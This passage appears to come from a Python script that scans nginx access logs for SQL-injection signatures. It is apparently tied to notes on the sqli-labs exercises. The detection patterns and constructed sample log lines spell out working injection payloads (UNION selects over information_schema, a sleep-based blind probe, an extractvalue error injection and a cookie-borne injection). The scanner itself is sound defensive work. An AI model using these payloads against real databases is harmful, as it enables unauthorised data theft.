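    "schema": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "file": re.compile(r"\binto\s+(out|dump)file\b|\bload_file\s*\(", re.I),
}

# Assumed (constructed) nginx log_format: the combined format with "$http_cookie"
# appended as a fifth quoted field, because Less-20 injects through the cookie.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"'
    r'(?: "(?P<cookie>[^"]*)")?$'
)


def decode(field: str) -> str:
    """Undo the two encodings a payload passes through before it reaches the log:
    nginx's \\xHH escaping of quotes in header fields, then URL encoding."""
    field = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), field)
    return unquote_plus(field)


def scan_line(line: str):
    """Return a sorted list of (field, family) hits for one access-log line,
    or None when the line does not match the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    for field in ("request", "referer", "user_agent", "cookie"):
        text = decode(m.group(field) or "")
        for family, pattern in SIGNATURES.items():
            if pattern.search(text):
                hits.append((field, family))
    return sorted(hits)


def scan(lines):
    """Map each suspicious line's index to its hits; clean lines are omitted."""
    report = {}
    for i, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            report[i] = hits
    return report


# Constructed sample lines modelled on the Less-1, Less-9, Less-18 and Less-20
# requests in the notes; 192.0.2.10 is a documentation address, not a real client.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 720 '
    '"-" "Mozilla/5.0" "-"',
    '192.0.2.10 - - [01/Jan/2020:10:00:01 +0000] "GET /Less-1/?id=-1%27+union+select+1,2,'
    'group_concat(table_name)+from+information_schema.tables+where+table_schema=database()'
    '+--+ HTTP/1.1" 200 690 "-" "Mozilla/5.0" "-"',
    '192.0.2.10 - - [01/Jan/2020:10:00:02 +0000] "GET /Less-9/?id=1%27+and+if(length('
    'database())=8,sleep(3),1)+--+ HTTP/1.1" 200 650 "-" "Mozilla/5.0" "-"',
    '192.0.2.10 - - [01/Jan/2020:10:00:03 +0000] "POST /Less-18/ HTTP/1.1" 200 810 "-" '
    '"\' and extractvalue(1,concat(0x7e,database())) and \'" "-"',
    '192.0.2.10 - - [01/Jan/2020:10:00:04 +0000] "GET /Less-20/ HTTP/1.1" 200 800 "-" '
    '"Mozilla/5.0" "uname=-admin\' union select 1,2,group_concat(column_name) from '
    'information_schema.columns where table_name=\\x27users\\x27 --+"',
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_LOG).items():
        print(idx, hits)
```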


Thanks to Kanxue (看雪) for providing the platform.

To be continued...